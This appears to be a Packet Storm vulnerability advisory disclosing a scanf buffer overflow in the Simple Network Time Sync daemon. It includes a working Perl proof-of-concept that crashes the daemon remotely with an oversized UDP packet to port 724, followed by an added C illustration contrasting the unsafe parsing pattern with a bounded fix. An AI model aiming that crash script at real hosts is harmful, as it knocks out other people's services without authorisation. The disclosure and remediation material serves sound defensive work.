kill_sntsd.pl

2000-06-01T00:00:00
ID PACKETSTORM:22006
Type packetstorm
Reporter Ben Taylor
Modified 2000-06-01T00:00:00

Description

I noticed an uncommon scanf overflow in the Simple Network Time Sync daemon
and client version 1.0, tested on Redhat 6.1. I haven't looked into this
fully yet, but it looks as tho it could be root compromising as it sits on a
privileged udp port and seems to coredump, but looks like it only gives you
50 chars to run code with. I have included some perl here which will crash
it remotely by sending it a string over 50 chars.
  
---------------------------------------  
  
#!/usr/bin/perl -w
#
# Usage: ./kill_sntsd <hostname>
#

use Socket;

send_packet(); # Needs to send 2 packets to kill the client and the server daemons
send_packet();

sub send_packet {

$proto = getprotobyname('udp');
$localaddr = gethostbyname("localhost") || die "error: $!\n";
$iaddr = gethostbyname($ARGV[0]) || die "$!\n";
$sin = sockaddr_in(724, $iaddr);           # SNTS daemon listens on udp/724
$paddr = sockaddr_in(53, $localaddr);      # source port 53 is privileged, so binding it needs root
socket(SH, PF_INET, SOCK_DGRAM, $proto) || die "socket: $!\n";
bind(SH, $paddr) || die "bind: $!\n";

$|=1;

connect(SH, $sin) || die "$!\n";

# A string longer than 50 characters...
print SH "logistixlogistixlogistixlogistixlogistixlogistixlogistix\n";
close(SH);

}
  
---------------------------------------  
  
logistix  
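As an added illustration of the bug class the report describes (this is constructed example code, not the SNTS source and not part of logistix's post), the C below puts an unbounded scanf read into a fixed 50-character buffer next to a bounded version that checks the datagram length first and uses a field width as a second line of defence. REQ_MAX = 50, the function names and the recv-into-a-string model are assumptions; the payload is the 56-character string plus newline that the perl script sends.

```c
#include <stdio.h>
#include <string.h>

/* Assumption: the report says the request is read with scanf into a buffer
 * of about 50 characters, so the buffer size is modelled as 50. */
#define REQ_MAX 50

/* Constructed copy of the datagram the perl script sends: 7 x "logistix"
 * (56 characters) followed by a newline, 57 bytes in total. */
static const char CRASH_PAYLOAD[] =
    "logistix" "logistix" "logistix" "logistix"
    "logistix" "logistix" "logistix" "\n";

/* Unsafe pattern: "%s" carries no field width, so sscanf keeps writing past
 * req[REQ_MAX - 1] for any token longer than 49 characters. Returns the token
 * length, or -1 if nothing was parsed. Only ever called with short input in
 * this example; with CRASH_PAYLOAD it would overflow req. */
int request_len_unbounded(const char *packet) {
    char req[REQ_MAX];
    if (sscanf(packet, "%s", req) != 1)
        return -1;
    return (int)strlen(req);
}

/* Hardened pattern. A UDP payload is not NUL-terminated, so its length is
 * passed in explicitly; any datagram that cannot fit in the request buffer is
 * dropped before parsing, and the field width in "%49s" (REQ_MAX - 1) caps
 * the write even if the length check were ever bypassed. Returns the token
 * length, or -1 when the datagram is rejected or holds no token. */
int request_len_bounded(const char *payload, size_t len) {
    char packet[REQ_MAX];
    char req[REQ_MAX];
    if (len == 0 || len >= REQ_MAX)   /* oversized or empty datagram: drop it */
        return -1;
    memcpy(packet, payload, len);
    packet[len] = '\0';               /* len <= 49, so this index is in bounds */
    if (sscanf(packet, "%49s", req) != 1)
        return -1;
    return (int)strlen(req);
}

int main(void) {
    size_t n = sizeof(CRASH_PAYLOAD) - 1;
    printf("crash payload: %zu bytes, bounded parser returns %d\n",
           n, request_len_bounded(CRASH_PAYLOAD, n));
    printf("short request \"sync\\n\": bounded parser returns %d\n",
           request_len_bounded("sync\n", 5));
    return 0;
}
```

The length check is the real fix: it turns an oversized datagram into a dropped packet (which can also be logged and counted as a scan indicator), while the field width only keeps the process from corrupting its stack if the check is ever lost in a refactor.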